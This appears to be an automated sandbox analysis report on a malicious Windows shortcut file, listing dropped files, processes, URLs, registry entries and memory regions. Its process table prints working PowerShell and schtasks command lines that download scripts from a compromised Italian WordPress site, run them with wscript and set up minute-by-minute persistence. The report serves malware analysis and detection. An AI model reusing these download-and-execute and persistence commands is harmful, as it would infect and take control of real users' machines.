Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
G9eWTvswoH.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command
line arguments, Icon number=11, Archive, ctime=Mon Apr 8 20:19:11 2024, mtime=Tue Nov 26 15:01:55 2024, atime=Mon Apr 8
20:19:11 2024, length=455680, window=hidenormalshowminimized
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\ProgramData\V58W09DALJEK.js
|
ASCII text, with very long lines (398)
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2g3e14le.blc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_51ualv0q.ung.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jui2snmb.fmb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kgoayipe.u4i.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lb44iw53.dkv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lhporkgo.4ci.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvzr103n.3bm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qpdwwj2g.yau.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1b4256c56cec4ba3.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I5L19KLJ717A9PVXF4LL.temp
|
data
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -comman [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$OEzDNWd8hg1rXRnS6ya = New-Object Net.WebClient; $cio = $OEzDNWd8hg1rXRnS6ya.DownloadData('https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php');
$OEzDNWd8hg1rXRnS6ya.DownloadFile('https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php', 'evQtmlDaSRMzUk.js');
schtasks /create /sc minute /mo 1 /f /tr ([System.Text.Encoding]::UTF8.GetString($cio) + $env:tmp + '\' + ('evQtmlDaSRMzUk.js
' * 2)) /tn ZA3XqiywQ;
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js
evQtmlDaSRMzUk.js " /tn ZA3XqiywQ
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js
"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js
"
|
|
|
|
C:\Windows\System32\schtasks.exe
|
"C:\Windows\system32\schtasks.exe" /delete /tn evQtmlDaSRMzUk.js /f
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\system32\wscript.exe" C:\ProgramData\V58W09DALJEK.js
|
|
|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\system32\wscript.EXE C:\Users\user\AppData\Local\Temp\evQtmlDaSRMzUk.js evQtmlDaSRMzUk.js
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "IWR -outfi $env:programdata\V58W09DALJEK.js -usebasi
'https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php'; schtasks /delete /tn evQtmlDaSRMzUk.js /f; wscript $env:programdata\V58W09DALJEK.js
"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 6 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://www.italialife24.it
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicuTsQo.php
|
46.254.34.201
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/0
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/afretPf.php
|
46.254.34.201
|
|
|
|
https://www.italialife24.it/wp-content
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/a
|
unknown
|
|
|
|
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxH2dz.php
|
46.254.34.201
|
|
|
|
https://www.italialife24.it/wp-c
|
unknown
|
|
|
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/stepPCj5H.php
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/triazoicutsqo.php
|
unknown
|
||
|
http://crl.microsc
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://oneget.orgX
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/afretpf.php
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/untrippingvT.ps1
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://oneget.org
|
unknown
|
||
|
http://italialife24.it
|
unknown
|
||
|
http://www.italialife24.it
|
unknown
|
||
|
https://www.italialife24.it/wp-content/uploads/2021/05/butterfliesxh2dz.php
|
unknown
|
There are 20 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
italialife24.it
|
46.254.34.201
|
|
|
|
www.italialife24.it
|
unknown
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
46.254.34.201
|
italialife24.it
|
Italy
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1F38F203000
|
trusted library allocation
|
page read and write
|
||
|
2254E690000
|
heap
|
page read and write
|
||
|
1D1B080F000
|
heap
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
26AAC70E000
|
heap
|
page read and write
|
||
|
17397DFB000
|
heap
|
page read and write
|
||
|
25EDB283000
|
heap
|
page read and write
|
||
|
17399BC3000
|
trusted library allocation
|
page read and write
|
||
|
17399C00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B8F0000
|
trusted library allocation
|
page read and write
|
||
|
970B8BC000
|
stack
|
page read and write
|
||
|
1E7D7E70000
|
trusted library allocation
|
page read and write
|
||
|
C3072FD000
|
stack
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
|
1D1B084D000
|
heap
|
page read and write
|
||
|
17397DAF000
|
heap
|
page read and write
|
||
|
17399C70000
|
heap
|
page execute and read and write
|
||
|
2446B945000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B856000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E7E8360000
|
trusted library allocation
|
page read and write
|
||
|
25EDB282000
|
heap
|
page read and write
|
||
|
1E7F05E4000
|
heap
|
page read and write
|
||
|
7FFD9BA44000
|
trusted library allocation
|
page read and write
|
||
|
165410D000
|
stack
|
page read and write
|
||
|
26AC6962000
|
heap
|
page read and write
|
||
|
25EDB2A8000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
15C6CF00000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
1F38EE05000
|
trusted library allocation
|
page read and write
|
||
|
970B6FE000
|
stack
|
page read and write
|
||
|
7FFD9B81C000
|
trusted library allocation
|
page execute and read and write
|
||
|
970B778000
|
stack
|
page read and write
|
||
|
26AAC71E000
|
heap
|
page read and write
|
||
|
173B1F50000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
25EDB298000
|
heap
|
page read and write
|
||
|
2254E4B0000
|
heap
|
page read and write
|
||
|
17912210000
|
heap
|
page read and write
|
||
|
7FFD9B78B000
|
trusted library allocation
|
page read and write
|
||
|
1E7D6620000
|
heap
|
page read and write
|
||
|
1D1B2509000
|
heap
|
page read and write
|
||
|
C30830E000
|
stack
|
page read and write
|
||
|
28CC21D0000
|
heap
|
page read and write
|
||
|
4790BFE000
|
stack
|
page read and write
|
||
|
1D1B0852000
|
heap
|
page read and write
|
||
|
26AC66E8000
|
heap
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page read and write
|
||
|
1E7D6452000
|
heap
|
page read and write
|
||
|
25EDB257000
|
heap
|
page read and write
|
||
|
1F38CDF0000
|
trusted library allocation
|
page read and write
|
||
|
25EDB26F000
|
heap
|
page read and write
|
||
|
1E7F07C0000
|
heap
|
page read and write
|
||
|
15C6CAF0000
|
heap
|
page read and write
|
||
|
25EDB242000
|
heap
|
page read and write
|
||
|
1F38CB50000
|
heap
|
page read and write
|
||
|
970BA3F000
|
stack
|
page read and write
|
||
|
D911D0B000
|
stack
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
8AA7E37000
|
stack
|
page read and write
|
||
|
8AA8B8E000
|
stack
|
page read and write
|
||
|
25EDB29C000
|
heap
|
page read and write
|
||
|
17912410000
|
heap
|
page read and write
|
||
|
25EDB291000
|
heap
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
26AAFE3D000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
26AAC5F0000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
BE3F2FE000
|
stack
|
page read and write
|
||
|
1652EFD000
|
stack
|
page read and write
|
||
|
15C6CB80000
|
heap
|
page read and write
|
||
|
1D1B0805000
|
heap
|
page read and write
|
||
|
47910FE000
|
stack
|
page read and write
|
||
|
1E7D9954000
|
trusted library allocation
|
page read and write
|
||
|
1F38CE80000
|
trusted library allocation
|
page read and write
|
||
|
25EDB27D000
|
heap
|
page read and write
|
||
|
1E7D646E000
|
heap
|
page read and write
|
||
|
2254E5CB000
|
heap
|
page read and write
|
||
|
1739B3D3000
|
trusted library allocation
|
page read and write
|
||
|
1F3A6D20000
|
heap
|
page read and write
|
||
|
26AAC8F5000
|
heap
|
page read and write
|
||
|
28CC2110000
|
heap
|
page read and write
|
||
|
4790FFF000
|
stack
|
page read and write
|
||
|
1E7D9946000
|
trusted library allocation
|
page read and write
|
||
|
2446B7C0000
|
heap
|
page read and write
|
||
|
8AA8CCE000
|
stack
|
page read and write
|
||
|
173B1C85000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
17399C81000
|
trusted library allocation
|
page read and write
|
||
|
173B1E1A000
|
heap
|
page read and write
|
||
|
7FFD9B912000
|
trusted library allocation
|
page read and write
|
||
|
20411820000
|
heap
|
page read and write
|
||
|
26AAC793000
|
heap
|
page read and write
|
||
|
173B2093000
|
heap
|
page read and write
|
||
|
1F38CE00000
|
heap
|
page readonly
|
||
|
1F38CC5E000
|
heap
|
page read and write
|
||
|
60887FD000
|
stack
|
page read and write
|
||
|
28CC1FF0000
|
heap
|
page read and write
|
||
|
25EDB271000
|
heap
|
page read and write
|
||
|
4CF54FE000
|
stack
|
page read and write
|
||
|
26AAC6D0000
|
heap
|
page read and write
|
||
|
1E7D6456000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
1E7F07F9000
|
heap
|
page read and write
|
||
|
1E7F069B000
|
heap
|
page read and write
|
||
|
1D1B0A15000
|
heap
|
page read and write
|
||
|
26AAFDB7000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B816000
|
trusted library allocation
|
page read and write
|
||
|
20411720000
|
heap
|
page read and write
|
||
|
1F38EB9E000
|
heap
|
page read and write
|
||
|
26AAE110000
|
heap
|
page read and write
|
||
|
25EDB2A7000
|
heap
|
page read and write
|
||
|
60883FF000
|
stack
|
page read and write
|
||
|
1F38EDEA000
|
trusted library allocation
|
page read and write
|
||
|
2254E5E2000
|
heap
|
page read and write
|
||
|
10C89FF000
|
stack
|
page read and write
|
||
|
8AA8B0E000
|
stack
|
page read and write
|
||
|
1E7D6494000
|
heap
|
page read and write
|
||
|
1F38EE02000
|
trusted library allocation
|
page read and write
|
||
|
C306ED2000
|
stack
|
page read and write
|
||
|
1F38CCE0000
|
heap
|
page read and write
|
||
|
17912217000
|
heap
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
C30753E000
|
stack
|
page read and write
|
||
|
2254E7C5000
|
heap
|
page read and write
|
||
|
4CF58FE000
|
stack
|
page read and write
|
||
|
26AB0183000
|
trusted library allocation
|
page read and write
|
||
|
10C88FF000
|
stack
|
page read and write
|
||
|
1D1B0806000
|
heap
|
page read and write
|
||
|
BE3ECFE000
|
stack
|
page read and write
|
||
|
25EDB2B4000
|
heap
|
page read and write
|
||
|
1D1B40D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
15C6CB20000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1F3A6E23000
|
trusted library allocation
|
page read and write
|
||
|
173B1DCF000
|
heap
|
page read and write
|
||
|
25EDB2C6000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page read and write
|
||
|
26AC68F4000
|
heap
|
page read and write
|
||
|
26AAFB69000
|
trusted library allocation
|
page read and write
|
||
|
D91207F000
|
stack
|
page read and write
|
||
|
1F38EBDE000
|
heap
|
page read and write
|
||
|
1D1B080E000
|
heap
|
page read and write
|
||
|
7FFD9B904000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
|
1D1B087B000
|
heap
|
page read and write
|
||
|
1652E7E000
|
stack
|
page read and write
|
||
|
2254E3D0000
|
heap
|
page read and write
|
||
|
1F38CB40000
|
heap
|
page read and write
|
||
|
26AC6566000
|
heap
|
page read and write
|
||
|
28CC1FFE000
|
heap
|
page read and write
|
||
|
1E7D6660000
|
heap
|
page read and write
|
||
|
7FFD9B763000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F39ED11000
|
trusted library allocation
|
page read and write
|
||
|
8AA7D78000
|
stack
|
page read and write
|
||
|
7FFD9B942000
|
trusted library allocation
|
page read and write
|
||
|
1E7D9962000
|
trusted library allocation
|
page read and write
|
||
|
17912380000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B773000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E7D7E90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
7FFD9B820000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page execute and read and write
|
||
|
1E7D9C2A000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
20411779000
|
heap
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
|
26AAC756000
|
heap
|
page read and write
|
||
|
1D1B081E000
|
heap
|
page read and write
|
||
|
7FFD9B930000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B952000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0760000
|
heap
|
page read and write
|
||
|
17397C20000
|
heap
|
page read and write
|
||
|
7FFD9B753000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D1B082F000
|
heap
|
page read and write
|
||
|
1F3A7010000
|
heap
|
page read and write
|
||
|
25EDEC10000
|
trusted library allocation
|
page read and write
|
||
|
173B1E70000
|
heap
|
page read and write
|
||
|
26ABE716000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F38CC08000
|
heap
|
page read and write
|
||
|
1739B520000
|
trusted library allocation
|
page read and write
|
||
|
970B838000
|
stack
|
page read and write
|
||
|
20413660000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
2254E5E2000
|
heap
|
page read and write
|
||
|
C3078BB000
|
stack
|
page read and write
|
||
|
1E7F05B0000
|
heap
|
page execute and read and write
|
||
|
47913FB000
|
stack
|
page read and write
|
||
|
26ABE571000
|
trusted library allocation
|
page read and write
|
||
|
173B1D90000
|
heap
|
page read and write
|
||
|
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
|
1D1B07A4000
|
heap
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B90F000
|
trusted library allocation
|
page read and write
|
||
|
8AA7B7D000
|
stack
|
page read and write
|
||
|
1739B2F8000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
26AAF18B000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0820000
|
heap
|
page read and write
|
||
|
7FFD9B774000
|
trusted library allocation
|
page read and write
|
||
|
1D1B07F9000
|
heap
|
page read and write
|
||
|
60889FB000
|
stack
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
C30854B000
|
stack
|
page read and write
|
||
|
8AA7763000
|
stack
|
page read and write
|
||
|
1F38CC46000
|
heap
|
page read and write
|
||
|
17397D48000
|
heap
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
|
25EDB280000
|
heap
|
page read and write
|
||
|
8AA7FBF000
|
stack
|
page read and write
|
||
|
7DF415D30000
|
trusted library allocation
|
page execute and read and write
|
||
|
17397DAD000
|
heap
|
page read and write
|
||
|
60884FE000
|
stack
|
page read and write
|
||
|
C3083CF000
|
stack
|
page read and write
|
||
|
BE3F0FE000
|
stack
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
10C8DFB000
|
stack
|
page read and write
|
||
|
25EDB242000
|
heap
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1739B54B000
|
trusted library allocation
|
page read and write
|
||
|
17912246000
|
heap
|
page read and write
|
||
|
1739B2CF000
|
trusted library allocation
|
page read and write
|
||
|
173B1F94000
|
heap
|
page read and write
|
||
|
2254E5CB000
|
heap
|
page read and write
|
||
|
1E7F0817000
|
heap
|
page read and write
|
||
|
1E7D995A000
|
trusted library allocation
|
page read and write
|
||
|
17399720000
|
heap
|
page read and write
|
||
|
25EDB1F0000
|
heap
|
page read and write
|
||
|
20413220000
|
heap
|
page read and write
|
||
|
17397DF5000
|
heap
|
page read and write
|
||
|
1F38CB70000
|
heap
|
page read and write
|
||
|
26AAFB63000
|
trusted library allocation
|
page read and write
|
||
|
25EDEAF0000
|
heap
|
page read and write
|
||
|
1739B3E3000
|
trusted library allocation
|
page read and write
|
||
|
1F38CC85000
|
heap
|
page read and write
|
||
|
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
26AAC798000
|
heap
|
page read and write
|
||
|
28CC21D5000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
8AA7AFE000
|
stack
|
page read and write
|
||
|
970B153000
|
stack
|
page read and write
|
||
|
17399B60000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B960000
|
trusted library allocation
|
page execute and read and write
|
||
|
970BABE000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B91A000
|
trusted library allocation
|
page read and write
|
||
|
970B4FF000
|
stack
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
4CF57FE000
|
stack
|
page read and write
|
||
|
1E7D6436000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
1739B2E8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B754000
|
trusted library allocation
|
page read and write
|
||
|
26AAFBA8000
|
trusted library allocation
|
page read and write
|
||
|
8AA7CFD000
|
stack
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
25EDB26F000
|
heap
|
page read and write
|
||
|
173B1F70000
|
heap
|
page read and write
|
||
|
8AA8D4C000
|
stack
|
page read and write
|
||
|
17397E10000
|
heap
|
page read and write
|
||
|
8AA7EB9000
|
stack
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
25EDB1E0000
|
heap
|
page read and write
|
||
|
1E7D9969000
|
trusted library allocation
|
page read and write
|
||
|
1F38CC3D000
|
heap
|
page read and write
|
||
|
1739B8EE000
|
trusted library allocation
|
page read and write
|
||
|
16534BE000
|
stack
|
page read and write
|
||
|
179122A5000
|
heap
|
page read and write
|
||
|
1E7F05B7000
|
heap
|
page execute and read and write
|
||
|
26AAE210000
|
heap
|
page read and write
|
||
|
17913FF0000
|
heap
|
page read and write
|
||
|
4CF5BFE000
|
stack
|
page read and write
|
||
|
26AAC75B000
|
heap
|
page read and write
|
||
|
7FFD9BA2D000
|
trusted library allocation
|
page read and write
|
||
|
C3084CC000
|
stack
|
page read and write
|
||
|
BE3EFFE000
|
stack
|
page read and write
|
||
|
179121F0000
|
heap
|
page read and write
|
||
|
1739AE1E000
|
trusted library allocation
|
page read and write
|
||
|
26AAC830000
|
heap
|
page read and write
|
||
|
1739B5A6000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0855000
|
heap
|
page read and write
|
||
|
7FFD9B911000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B910000
|
trusted library allocation
|
page read and write
|
||
|
1739B394000
|
trusted library allocation
|
page read and write
|
||
|
1E7E84FE000
|
trusted library allocation
|
page read and write
|
||
|
26AB00BE000
|
trusted library allocation
|
page read and write
|
||
|
1739B56C000
|
trusted library allocation
|
page read and write
|
||
|
C306F5E000
|
stack
|
page read and write
|
||
|
1F38ECF0000
|
heap
|
page execute and read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B764000
|
trusted library allocation
|
page read and write
|
||
|
16532B7000
|
stack
|
page read and write
|
||
|
26AAFF2A000
|
trusted library allocation
|
page read and write
|
||
|
179122AC000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
1F38F1C7000
|
trusted library allocation
|
page read and write
|
||
|
1E7D993A000
|
trusted library allocation
|
page read and write
|
||
|
1D1B0830000
|
heap
|
page read and write
|
||
|
165307E000
|
stack
|
page read and write
|
||
|
1F38EBF3000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B921000
|
trusted library allocation
|
page read and write
|
||
|
8AA8E4E000
|
stack
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1E7D9BA3000
|
trusted library allocation
|
page read and write
|
||
|
10C814A000
|
stack
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
25EDCDC4000
|
heap
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page execute and read and write
|
||
|
16531F9000
|
stack
|
page read and write
|
||
|
1E7D6520000
|
heap
|
page read and write
|
||
|
C30747D000
|
stack
|
page read and write
|
||
|
7FFD9B880000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
|
26AAC8B0000
|
trusted library allocation
|
page read and write
|
||
|
26AAE215000
|
heap
|
page read and write
|
||
|
1D1B0846000
|
heap
|
page read and write
|
||
|
15C6CB00000
|
heap
|
page read and write
|
||
|
1D1B07D0000
|
heap
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
